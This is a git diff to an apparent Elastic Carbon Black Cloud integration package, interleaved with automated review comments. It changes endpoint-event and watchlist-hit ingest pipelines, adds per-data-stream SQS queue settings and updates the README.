"timestamp": "2022-02-10 11:48:51 +0000 UTC" + }, + "create_time": "2022-02-10T08:03:29.540Z", + "device": { + "external_ip": "89.160.20.156", + "os": "WINDOWS", + "timestamp": "2022-02-10 11:48:05 +0000 UTC" + }, + "event_origin": "EDR", + "organization_key": "XXXXXXXX", + "process": { + "parent": { + "reputation": "REP_RESOLVING" + }, + "publisher": [ + { + "name": "Microsoft Windows", + "state": [ + "FILE_SIGNATURE_STATE_SIGNED", + "FILE_SIGNATURE_STATE_VERIFIED", + "FILE_SIGNATURE_STATE_TRUSTED", + "FILE_SIGNATURE_STATE_OS", + "FILE_SIGNATURE_STATE_CATALOG_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING", + "terminated": false, + "username": "NT AUTHORITY\\SYSTEM" + }, + "schema": 1, + "scriptload": { + "count": 1, + "effective_reputation": "REP_NOT_LISTED", + "publisher": [ + { + "state": [ + "FILE_SIGNATURE_STATE_NOT_SIGNED" + ] + } + ], + "reputation": "REP_RESOLVING" + }, + "sensor_action": "ACTION_ALLOW", + "type": "endpoint.event.scriptload" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ACTION_LOAD_SCRIPT", + "original": "{\"type\":\"endpoint.event.scriptload\",\"process_guid\":\"XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33\",\"parent_guid\":\"XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49\",\"backend_timestamp\":\"2022-02-10 11:48:51 +0000 UTC\",\"org_key\":\"XXXXXXXX\",\"device_id\":\"16\",\"device_name\":\"DESKTOP-015\",\"device_external_ip\":\"89.160.20.156\",\"device_os\":\"WINDOWS\",\"device_group\":\"\",\"action\":\"ACTION_LOAD_SCRIPT\",\"schema\":1,\"device_timestamp\":\"2022-02-10 11:48:05 +0000 UTC\",\"create_time\": \"2022-02-10T08:03:29.540Z\",\"process_terminated\":false,\"process_reputation\":\"REP_RESOLVING\",\"parent_reputation\":\"REP_RESOLVING\",\"process_pid\":4600,\"parent_pid\":6728,\"process_publisher\":[{\"name\":\"Microsoft Windows\",\"state\":\"FILE_SIGNATURE_STATE_SIGNED | FILE_SIGNATURE_STATE_VERIFIED | FILE_SIGNATURE_STATE_TRUSTED | FILE_SIGNATURE_STATE_OS | 
FILE_SIGNATURE_STATE_CATALOG_SIGNED\"}],\"process_path\":\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"parent_path\":\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"process_hash\":[\"24590bf74bbbbfd7d7ac070f4e3c44fd\",\"ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03\"],\"parent_hash\":[\"2d287989c6f60fa434a345b79b919755\",\"f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89\"],\"process_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"sensor_action\":\"ACTION_ALLOW\",\"event_origin\":\"EDR\",\"scriptload_count\":1,\"scriptload_reputation\":\"REP_RESOLVING\",\"scriptload_effective_reputation\":\"REP_NOT_LISTED\",\"scriptload_publisher\":[{\"state\":\"FILE_SIGNATURE_STATE_NOT_SIGNED\"}]}" + }, + "host": { + "hostname": "DESKTOP-015", + "id": "16", + "ip": [ + "89.160.20.156" + ], + "name": "DESKTOP-015", + "os": { + "type": "windows" + } + }, + "process": { + "command_line": "\"C:\\WINDOWS\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"", + "entity_id": "XXXXXXXX-004e050d-000011f8-00000000-1d81e740ff3ff33", + "executable": "c:\\windows\\system32\\cscript.exe", + "hash": { + "md5": "24590bf74bbbbfd7d7ac070f4e3c44fd", + "sha256": "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03" + }, + "parent": { + "command_line": "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe\" -Embedding", + "entity_id": "XXXXXXXX-004e050d-00001a48-00000000-1d81e206b2e4f49", + "executable": "c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe", + "hash": { + "md5": "2d287989c6f60fa434a345b79b919755", + "sha256": "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + }, + "pid": 6728 + }, + "pid": 4600 
+ }, + "related": { + "hash": [ + "24590bf74bbbbfd7d7ac070f4e3c44fd", + "2d287989c6f60fa434a345b79b919755", + "ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03", + "f66196626700ae0728c0269febf2c194f9b73c49dfe7f4fa869d3b96334e5d89" + ], + "hosts": [ + "DESKTOP-015" + ], + "ip": [ + "89.160.20.156" + ], + "user": [ + "NT AUTHORITY\\SYSTEM" + ] + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs index 26c4d05045f..a2585da6986 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/agent/stream/aws-s3.yml.hbs @@ -15,7 +15,9 @@ bucket_list_prefix: {{bucket_list_prefix}} {{else}} -{{#if queue_url}} +{{#if queue_url_endpoint_event}} +queue_url: {{queue_url_endpoint_event}} +{{else if queue_url}} queue_url: {{queue_url}} {{/if}} {{#if visibility_timeout}} diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml index d1dea8dee9b..c9a7a528ad4 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/elasticsearch/ingest_pipeline/default.yml 
@@ -13,17 +13,34 @@ processors: field: event.original target_field: json ignore_failure: true + - set: + field: _temp_.device_timestamp + copy_from: json.device_timestamp + on_failure: + - remove: + field: json.device_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: json.create_time - if: ctx.json?.create_time != null && ctx.json.create_time != '' + field: json.device_timestamp + if: ctx.json?.device_timestamp != null && ctx.json.device_timestamp != '' formats: - ISO8601 + - 'yyyy-MM-dd HH:mm:ss Z z' + - 'yyyy-MM-dd HH:mm:ss.S Z z' + - 'yyyy-MM-dd HH:mm:ss.SS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSSSS Z z' + - 'yyyy-MM-dd HH:mm:ss.SSSSSSS Z z' on_failure: - remove: - field: json.create_time + field: json.device_timestamp - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.action target_field: event.action @@ -62,7 +79,6 @@ processors: if: ctx.json?.netconn_inbound == false - convert: field: json.remote_port - target_field: source.port type: long ignore_missing: true on_failure: @@ -70,10 +86,9 @@ processors: field: json.remote_port - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.remote_ip - target_field: source.ip type: ip ignore_missing: true on_failure: 
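Review bot: The new `set` that copies `json.device_timestamp` into `_temp_.device_timestamp` has no `ignore_empty_value: true`, unlike the matching `set` later in this file that copies it back, so an event with no `device_timestamp` field appears to fall into the `on_failure` branch and pick up a spurious `error.message` before the guarded `date` processor is even reached. Adding `ignore_empty_value: true` to that `set` keeps the two copies consistent and reserves `error.message` for genuine parse failures. Note also that `@timestamp` is now derived only from `device_timestamp`; the former ISO8601 `create_time` source is no longer a fallback, so an absent or unparsable device timestamp leaves `@timestamp` to whatever the agent supplied — if that is intended, a `description:` on the `date` processor saying so would help the next reader. The `processors` list continues on both sides of this hunk.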
@@ -81,20 +96,9 @@ processors: field: json.remote_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' - - append: - field: related.ip - value: '{{{source.ip}}}' - if: ctx.source?.ip != null - allow_duplicates: false - ignore_failure: true - - rename: - field: json.netconn_domain - target_field: source.address - ignore_missing: true + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.local_port - target_field: client.port type: long ignore_missing: true on_failure: @@ -102,10 +106,9 @@ processors: field: json.local_port - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.local_ip - target_field: client.ip type: ip ignore_missing: true on_failure: 
@@ -113,7 +116,44 @@ processors: field: json.local_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + lang: painless + source: | + // These allocations may be futile, but will be cleaned up in the postamble. + if (ctx.client == null) { + ctx.client = new HashMap(); + } + if (ctx.source == null) { + ctx.source = new HashMap(); + } + if (ctx.destination == null) { + ctx.destination = new HashMap(); + } + // Nulls inserted into the document will be cleaned up in the postamble. + ctx.client.ip = ctx.json.local_ip; + ctx.client.port = ctx.json.local_port; + if (ctx.json?.netconn_inbound == true) { + ctx.destination.ip = ctx.json?.local_ip; + ctx.destination.port = ctx.json?.local_port; + ctx.source.ip = ctx.json?.remote_ip; + ctx.source.port = ctx.json?.remote_port; + } else { + ctx.source.ip = ctx.json?.local_ip; + ctx.source.port = ctx.json?.local_port; + ctx.destination.ip = ctx.json?.remote_ip; + ctx.destination.port = ctx.json?.remote_port; + } + - append: + field: related.ip + value: '{{{source.ip}}}' + if: ctx.source?.ip != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.netconn_domain + target_field: source.address + ignore_missing: true - append: field: related.ip value: '{{{client.ip}}}' @@ -194,7 +234,7 @@ processors: field: json.process_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.parent_cmdline target_field: process.parent.command_line 
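Review bot: For outbound connections the remote IP no longer reaches `related.ip`: the script puts `remote_ip` into `destination.ip` whenever `netconn_inbound` is not true, but the only `related.ip` appends that follow are for `source.ip` and `client.ip`, which are both `local_ip` in that branch, so the remote address that the old unconditional `source.ip` mapping contributed is dropped unless a `destination.ip` append exists outside this hunk. A third append for `destination.ip` beside the existing two closes the gap. Separately, `ctx.client.ip = ctx.json.local_ip;` and the line after it dereference `ctx.json` without the `?.` used on every other line of the script, so they throw if `json` is absent (the `json` processor above runs with `ignore_failure: true`); `ctx.json?.local_ip` / `ctx.json?.local_port` would match the rest. The `processors` list continues on both sides of this hunk.

```yaml
      # ... unchanged: HashMap allocations ...
      ctx.client.ip = ctx.json?.local_ip;
      ctx.client.port = ctx.json?.local_port;
      # ... unchanged: inbound/outbound source/destination assignment ...
  - append:
      field: related.ip
      value: '{{{destination.ip}}}'
      if: ctx.destination?.ip != null
      allow_duplicates: false
      ignore_failure: true
  # ... unchanged: existing related.ip appends for source.ip and client.ip ...
```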
@@ -217,7 +257,7 @@ processors: field: json.parent_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.regmod_name target_field: registry.path @@ -294,9 +334,19 @@ processors: field: json.backend_timestamp target_field: carbon_black_cloud.endpoint_event.backend.timestamp ignore_missing: true + - set: + field: carbon_black_cloud.endpoint_event.device.timestamp + copy_from: _temp_.device_timestamp + ignore_empty_value: true + on_failure: + - remove: + field: carbon_black_cloud.endpoint_event.device.timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: - field: json.device_timestamp - target_field: carbon_black_cloud.endpoint_event.device.timestamp + field: json.create_time + target_field: carbon_black_cloud.endpoint_event.create_time ignore_missing: true - rename: field: json.device_os @@ -320,7 +370,7 @@ processors: field: json.process_duration - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.process_publisher processor: @@ -348,7 +398,7 @@ processors: field: json.process_terminated - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.process_username target_field: carbon_black_cloud.endpoint_event.process.username 
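Review bot: The reason for the `_temp_.device_timestamp` round-trip is not stated anywhere, and a reader will wonder why `json.device_timestamp` is not simply renamed into `carbon_black_cloud.endpoint_event.device.timestamp` as it was before. Presumably the copy exists because the `date` processor's `on_failure` earlier in this file removes `json.device_timestamp`, so without the temp copy the raw string would be lost exactly when parsing fails; if so, a `description:` on this `set`, e.g. `Restore the raw device_timestamp string, preserved in _temp_ so it survives a failed date parse.`, would make the intent explicit. The `processors` list continues on both sides of this hunk.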
@@ -398,7 +448,7 @@ processors: field: json.crossproc_target - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.crossproc_reputation target_field: carbon_black_cloud.endpoint_event.crossproc.reputation @@ -521,7 +571,7 @@ processors: field: json.modload_count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.modload_publisher processor: @@ -554,7 +604,7 @@ processors: field: json.netconn_proxy_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.ip value: '{{{carbon_black_cloud.endpoint_event.netconn.proxy.ip}}}' @@ -580,7 +630,7 @@ processors: field: json.childproc_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.childproc_publisher processor: @@ -656,7 +706,7 @@ processors: field: json.scriptload_count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.scriptload_hash_md5 target_field: carbon_black_cloud.endpoint_event.scriptload.hash.md5 
@@ -695,7 +745,7 @@ processors: field: json.device_internal_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: host.ip value: '{{{carbon_black_cloud.endpoint_event.device.internal_ip}}}' @@ -718,7 +768,7 @@ processors: field: json.device_external_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.schema target_field: carbon_black_cloud.endpoint_event.schema @@ -729,7 +779,7 @@ processors: field: json.schema - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: host.ip value: '{{{carbon_black_cloud.endpoint_event.device.external_ip}}}' @@ -775,6 +825,8 @@ processors: - json.device_external_ip - json.device_internal_ip - json.netconn_proxy_ip + - json.device_timestamp + - _temp_ ignore_missing: true - script: description: Adds all the remaining fields in fields under carbon_black_cloud.endpoint_event. @@ -838,4 +890,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml index 0dfa0f183b7..fa3c12ea3f5 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml 
+++ b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/ecs.yml @@ -2,6 +2,10 @@ name: client.ip - external: ecs name: client.port +- external: ecs + name: destination.ip +- external: ecs + name: destination.port - external: ecs name: dll.hash.md5 - external: ecs diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml index af12326154f..e792de11aa9 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/fields/fields.yml @@ -237,3 +237,6 @@ - name: type type: keyword description: The event type. + - name: create_time + type: keyword + description: The time at which the event was ingested in carbon black cloud. diff --git a/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml b/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml index 97d31940eb8..17a921e3466 100644 --- a/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/endpoint_event/manifest.yml @@ -6,6 +6,15 @@ streams: description: Collect endpoint events from Carbon Black Cloud. template_path: aws-s3.yml.hbs vars: + - name: queue_url_endpoint_event + type: text + title: "[Endpoint Event][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is an endpoint event data stream specific queue URL. This will override the global queue URL if provided. - name: bucket_list_prefix type: text title: "[S3] Bucket Prefix" 
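Review bot: `create_time` is declared `type: keyword` although it carries a timestamp — the fixtures in this change show it as ISO8601 (`2022-02-10T08:03:29.540Z`), and before this change the same value was parsed by a `date` processor. Mapping it as `type: date` would keep range queries and sorting on the ingestion time working now that it is no longer the source of `@timestamp`; as a keyword it can only be matched literally. If the keyword choice is deliberate (e.g. to tolerate unparsable values without a pipeline failure), the description should say so.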
@@ -60,8 +69,8 @@ streams: required: false show_user: false default: | - - regex: "endpoint_event_logs/" - description: If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + # - regex: "endpoint_event_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs index 26c4d05045f..3cda66cf74d 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs 
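Review bot: The `default` for `file_selectors` is now a block scalar whose only content is a YAML comment, so the effective default is an empty selector list and the input accepts every object notification it receives; that is the intent stated in the description, but encoding "no filter" as a commented-out line is easy to misread, and a user who simply uncomments the example without reading the NOTE silently gets the old shared-queue behaviour back. With an empty selector and the global queue still configured, each data stream's input will now consume notifications for every prefix, so the data loss the NOTE refers to is only avoided once a per-stream queue is actually set; the comment should make that explicit, e.g. `# Example only. Leave file_selectors empty and configure the per-data-stream SQS queue instead (see description).` above the regex line, or drop `default` and move the example into the description. The same construct appears in the watchlist_hit manifest hunk.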
+++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/agent/stream/aws-s3.yml.hbs @@ -15,7 +15,9 @@ bucket_list_prefix: {{bucket_list_prefix}} {{else}} -{{#if queue_url}} +{{#if queue_url_watchlist_hit}} +queue_url: {{queue_url_watchlist_hit}} +{{else if queue_url}} queue_url: {{queue_url}} {{/if}} {{#if visibility_timeout}} diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml index ea4b42d95ae..e8e0806640d 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/elasticsearch/ingest_pipeline/default.yml @@ -26,7 +26,7 @@ processors: field: json.create_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.severity target_field: event.severity @@ -37,7 +37,7 @@ processors: field: json.severity - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.device_id target_field: host.id @@ -54,7 +54,7 @@ processors: field: json.schema - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: host.os.type value: windows 
@@ -107,7 +107,7 @@ processors: field: json.process_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.parent_cmdline target_field: process.parent.command_line @@ -130,7 +130,7 @@ processors: field: json.parent_pid - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: related.user value: '{{{json.parent_username}}}' @@ -231,7 +231,7 @@ processors: field: json.device_internal_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.device_external_ip target_field: carbon_black_cloud.watchlist_hit.device.external_ip @@ -242,7 +242,7 @@ processors: field: json.device_external_ip - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - append: field: host.ip value: '{{{carbon_black_cloud.watchlist_hit.device.internal_ip}}}' @@ -400,4 +400,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' 
diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml b/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml index 25cb25005ea..6fb882ce295 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/fields/fields.yml @@ -53,6 +53,13 @@ - name: publisher type: group description: signature entry for the process as reported by the endpoint. + fields: + - name: name + type: keyword + description: The name of the publisher. + - name: state + type: keyword + description: The state of the publisher. - name: reputation type: keyword description: Reputation of the actor process; applied when event is processed by the Carbon Black Cloud i.e. after sensor delivers event to the cloud. diff --git a/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml b/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml index 24fc8610729..7f859df620f 100644 --- a/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/watchlist_hit/manifest.yml @@ -6,6 +6,15 @@ streams: description: Collect watchlist hit from Carbon Black Cloud. template_path: aws-s3.yml.hbs vars: + - name: queue_url_watchlist_hit + type: text + title: "[Watchlist Hit][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is a watchlist hit data stream specific queue URL. This will override the global queue URL if provided. - name: bucket_list_prefix type: text title: "[S3] Bucket Prefix" 
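Review bot: In the watchlist_hit `fields.yml` hunk the new `publisher.state` field is documented only as "The state of the publisher", which does not tell an analyst what values to expect or what they mean for trust decisions. The sample alert elsewhere in this change refers to a `process_publisher_state` of `FILE_SIGNATURE_STATE_TRUSTED`, which suggests this is a code-signing state; if that also holds for watchlist hits, a description such as `description: Signature verification state of the publisher (for example FILE_SIGNATURE_STATE_TRUSTED).` would make the field usable in detection logic. Please confirm the value set from the watchlist hit schema before committing to that wording.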
@@ -60,8 +69,8 @@ streams: required: false show_user: false default: | - - regex: "watchlist_hit_logs/" - description: If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + # - regex: "watchlist_hit_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/docs/README.md b/packages/carbon_black_cloud/docs/README.md index 481162d19ee..f7f0a558d3b 100644 --- a/packages/carbon_black_cloud/docs/README.md +++ b/packages/carbon_black_cloud/docs/README.md 
@@ -2,9 +2,29 @@ The VMware Carbon Black Cloud integration collects and parses data from the Carbon Black Cloud REST APIs and AWS S3 bucket. -## Compatibility +## Version 2.0.0+ Update Disclaimer +Carbon Black Cloud `Alerts API (v6)` [will be deactivated on July 31, 2024](https://developer.carbonblack.com/reference/carbon-black-cloud/api-migration/#migration-summary). After this, the current alert data stream will become unusable. To enable a smooth transition we have introduced a new data stream named `alert_v7` based on the major `Alerts API (v7)` schema changes and `Data Forwarder 2.0` schema changes. This data stream has significant changes compared to the original data stream and is only available for our new `CEL input` which is currently tagged as `[Beta]`. Please consult the official docs [Alerts v7](https://developer.carbonblack.com/reference/carbon-black-cloud/guides/api-migration/alerts-migration) and [Data Forwarder 2.0](https://developer.carbonblack.com/reference/carbon-black-cloud/data-forwarder/schema/latest/alert-2.0.0/) for further info. After July 31, 2024, the old alerts v6 data stream will be deprecated and removed from the HTTPJSON input and only the new `alert_v7` data stream will exist under the `CEL input`. + +## Version 1.21+ Update Disclaimer +Starting from version 1.21, if using multiple AWS data streams simultaneously configured to use AWS SQS, separate SQS queues should be configured per +data stream. The default values of file selector regexes have been commented out for this reason. The only reason the global queue now exists is to avoid +a breaking change while upgrading to version 1.21 and above. A separate SQS queue per data stream should help fix the data loss that's been occurring in the +older versions. + +## HTTPJSON vs CEL +Version 2.0.0 introduces the use of the CEL input. This input method is currently marked as [Beta] while the older HTTPJSON input method has been +marked as [Legacy]. 
